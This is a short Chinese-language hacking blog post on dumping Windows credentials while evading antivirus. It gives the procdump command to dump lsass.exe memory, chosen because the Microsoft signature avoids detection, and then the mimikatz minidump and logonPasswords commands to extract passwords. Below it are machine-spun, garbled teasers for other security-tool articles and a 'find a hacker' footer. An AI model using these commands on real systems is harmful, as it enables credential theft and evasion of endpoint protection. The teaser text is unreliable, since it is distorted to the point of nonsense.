绕过杀毒软件抓取windows密码

hacker5年前 (2020-05-31)黑客文章805

使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。

			mimikatz # sekurlsa::minidump lsass.dmp
		
			Switch to MINIDUMP
		
			mimikatz # sekurlsa::logonPasswords

具体可以参考原文：

http://blog.gentilkiwi.com/securite/mimikatz/minidump

标签: 黑客技术

返回列表

什么叫Stunnel？此专用工具致力于做为虚拟服务器和远程控制手机客户端中间的SSL数据加密包裝。要是工程建筑全过程合乎其安全设置，Stunnel能够从FIPS 140-2认证OpenSSL FI...

本文介绍一个用C语言和网络数据包分析开发工具实现的简易网络Sniffer。目前，已经有不少的Sniff工具软件，如Windows环境下，最富盛名的工具是Netxray和Sniffer pro，用它们在...

Argus是啥？ Argus可用以协助适用网络信息安全管理方法和互联网调查取证。根据恰当的对策，克罗地亚数据信息能够被采掘，以明确您是不是古代历史遭受侵入或进攻，在公布进攻并明确了让步指标值（IO...

什么叫Nagios？ Nagios是一个互联网和监视系统程序运行。它监控您特定的服务项目和服务器，当事儿受到影响或事儿越来越更强时友情提示。Nagios的很多作用包含：监控器全部IT系统架构，马上了...

在一些好莱坞电影中，我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码，而且不会一下子全部入侵/破解，这是不是令人羡慕？事实上，我们也可以像电影和游戏中的黑客一样攻...

什么是AppScan？ AppScan在全部运用软件开发生命期中开展安全性测试，在设计阶段初期出示安全系数确保，并开展简单化单元测试卷。该专用工具能够扫描仪很多普遍的系统漏洞，比如HTTP回应切分，...

找黑客平台